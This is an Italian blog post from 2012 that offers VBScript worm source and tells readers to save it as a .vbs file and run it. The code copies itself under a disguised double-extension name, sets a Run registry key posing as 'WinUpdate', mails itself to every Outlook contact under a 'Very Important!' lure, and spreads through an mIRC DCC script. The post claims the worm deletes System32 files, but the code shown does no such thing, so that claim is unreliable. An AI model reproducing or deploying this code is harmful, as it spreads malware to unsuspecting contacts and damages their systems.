sabato 21 luglio 2012

Creare un worm in vbs

Inserite questo codice in un nuovo documento di testo
Quando avete fatto salvatelo con estenzione .vbs esempio ciao.vbs,il virus è in grado di rallentare pc,smartphone ed elimina file di system32 dopo 6 giorni dall'apertura potete dire ciao al pc

'Vbs.Vbswg.nome worm Created By PUOHIF. 22/06/2012
Set CAA22804 = createobject("scripting.filesystemobject")
CLJ44F3A = CAA22804.getspecialfolder(0)
KJ6Q4784 = CLJ44F3A & "\Vbswg_Worm.jpg.vbs"
Set NJEV7C5P = createobject("wscript.shell")
NJEV7C5P.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinUpdate", "wscript.exe " & KJ6Q4784 & " %"
CAA22804.copyfile wscript.scriptfullname, KJ6Q4784
If NJEV7C5P.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\nome worm\H3NG1763") <> 1 then
O4NHG707
End if
If NJEV7C5P.regread("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\nome worm\DS1U8653") <> 1 then
S6QQ5E58 ""
End if
Function O4NHG707()
Set A5OH32TB = CreateObject("Outlook.Application")
If A5OH32TB = "Outlook" Then
Set I3VJ18SD = A5OH32TB.GetNameSpace("MAPI")
Set F01BAOB2 = I3VJ18SD.AddressLists
For Each F77ETF38 In F01BAOB2
If F77ETF38.AddressEntries.Count <> 0 Then
QV6152GJ = F77ETF38.AddressEntries.Count
For CFB19566 = 1 To QV6152GJ
Set G0VK86CT = A5OH32TB.CreateItem(0)
Set H8V5U358 = F77ETF38.AddressEntries(CFB19566)
G0VK86CT.To = H8V5U358.Address
G0VK86CT.Subject = "Very Important!"
G0VK86CT.Body = "Hi:" & vbcrlf & "Please view this file, it's very important." & vbcrlf & ""
execute "set D48D423S =G0VK86CT." & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
LP3F4775 = KJ6Q4784
G0VK86CT.DeleteAfterSubmit = True
D48D423S.Add LP3F4775
If G0VK86CT.To <> "" Then
G0VK86CT.Send
End If
Next
End If
Next
End If
End function
Function S6QQ5E58(QQ4L0KMM)
If QQ4L0KMM <> "" Then
I9I462MH = NJEV7C5P.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If CAA22804.fileexists("c:\mirc\mirc.ini") Then
QQ4L0KMM = "c:\mirc"
ElseIf CAA22804.fileexists("c:\mirc32\mirc.ini") Then
QQ4L0KMM = "c:\mirc32"
ElseIf CAA22804.fileexists(I9I462MH & "\mirc\mirc.ini") Then
QQ4L0KMM = I9I462MH & "\mirc"
ElseIf CAA22804.fileexists(I9I462MH & "\mirc32\mirc.ini") Then
QQ4L0KMM = I9I462MH & "\mirc"
Else
QQ4L0KMM = ""
End If
End If
If QQ4L0KMM <> "" Then
Set F76MQS3O = CAA22804.CreateTextFile(QQ4L0KMM & "\script.ini", True)
F76MQS3O = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
F76MQS3O = F76MQS3O & vbCrLf & "n0=on 1:JOIN:#:{"
F76MQS3O = F76MQS3O & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
F76MQS3O = F76MQS3O & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
F76MQS3O = F76MQS3O & KJ6Q4784
F76MQS3O = F76MQS3O & vbCrLf & "n3=}"
script.Close
End If
End Function
Pubblicato da alle

Nessun commento:

Posta un commento

Iscriviti a: Commenti sul post (Atom)